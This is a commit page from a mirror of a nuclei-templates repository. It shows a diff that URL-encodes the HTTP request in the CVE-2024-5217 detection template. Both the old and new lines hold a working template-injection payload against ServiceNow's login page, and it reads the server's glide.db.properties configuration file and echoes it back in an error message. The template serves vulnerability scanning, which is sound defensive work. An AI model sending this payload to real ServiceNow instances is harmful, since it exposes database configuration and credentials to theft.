daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2024-5217.yaml 

Encoding special characters makes the output file more concise
patch-16
我会啊D,明小子,御剑 2024-11-21 00:59:50 +08:00 committed by GitHub
parent 8326a59fca
commit d4936e82fe
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
http/cves/2024/CVE-2024-5217.yaml
View File

@ -28,7 +28,7 @@ info:
http:
- raw:
- |
GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and